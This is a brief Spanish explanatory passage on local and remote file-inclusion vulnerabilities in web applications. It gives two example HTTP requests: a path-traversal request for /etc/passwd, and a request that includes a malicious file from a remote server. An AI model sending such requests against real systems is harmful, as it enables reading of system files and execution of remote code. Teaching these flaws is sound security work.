Estas vulnerabilidades afectan a la subida de ficheros en una aplicación web.
Acceso a ficheros dentro de un mismo servidor, ejecutando código en la aplicación para acceder a recursos del servidor.
GET dominio.meow/ejemplolfi.php?file=../../../etc/passwd HTTP/1.1
Acceso a ficheros en servidores remotos.
GET dominio.meow/ejemplorfi.php?file=dominioRemoto/ficheroMalicioso HTTP/1.1